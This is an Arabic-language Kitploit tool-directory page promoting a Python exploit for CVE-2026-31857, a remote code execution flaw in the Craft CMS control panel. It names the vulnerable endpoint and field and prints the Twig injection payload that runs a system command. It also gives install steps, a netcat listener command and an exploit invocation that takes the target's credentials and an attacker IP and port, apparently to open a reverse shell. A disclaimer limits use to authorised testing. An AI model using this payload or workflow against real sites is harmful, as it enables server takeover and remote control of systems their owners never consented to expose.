Skip to content
KitploitKITPLOIT
أدواتعمليات الاستغلالالمدونة
Log in
إرسال
أدواتعمليات الاستغلالالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

الخلاصاتاتصالالخصوصية© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-31857 — Craft CMS RCE عبر الشروط العلائقية في لوحة التحكم | Kitploit
أدوات/GitHubGitHub/0xtatsuki/cve-2026-31857
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبما بعد الاستغلالأمن الويباختبار الاختراقالفريق الأحمرأداة الوصول عن بعدتطوير الحمولات
GitHub0xtatsuki/cve-2026-31857

CVE-2026-31857

Craft CMS RCE عبر الشروط العلائقية في لوحة التحكم

منذ يوم واحدلم تتم المراجعة بعد
عرض المستودع

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2026-31857 - استغلال RCE في Craft CMS

استغلال Python لثغرة RCE في لوحة تحكم Craft CMS، يتم تفعيلها عبر نقطة النهاية admin/actions/element-indexes/count-elements. يتم الحقن عبر حقل elementIds الخاص بشرط RelatedToConditionRule، والذي يُفسَّر كـ Twig من جهة الخادم ويُستغل عبر فلتر system لتنفيذ أمر عشوائي ({{[['<cmd>']|filter('system')]}}).

تم الإفصاح عن الثغرة بواسطة NeoSprings

الإصدارات المتأثرة :

  • >= 5.0.0-RC1, <= 5.9.8
  • >= 4.0.0-beta.1, <= 4.17.3

المراجع :

  • https://github.com/craftcms/cms/security/advisories/GHSA-fp5j-j7j4-mcxc
  • https://nvd.nist.gov/vuln/detail/cve-2026-31857

التثبيت

$ git clone https://github.com/0xTatsuki/CVE-2026-31857.git
$ cd CVE-2026-31857
$ pip install -r requirements.txt

الاستخدام

  1. ابدأ المستمع قبل تشغيل الاستغلال :
$ nc -lvnp <attacker_port>
  1. شغّل الاستغلال :
$ python3 CVE-2026-31857.py -t http://<craftcms_base_url> -u <username> -p <password> -i <attacker_ip> -P <attacker_port>

إخلاء المسؤولية

تُقدَّم هذه الأداة لأغراض تعليمية وللتمارين المصرَّح بها فقط (CTF، اختبار اختراق متعاقد عليه أو اختبار محلي). استخدامها ضد أي نظام دون تصريح صريح يُعد غير قانوني.

تنزيل الأداة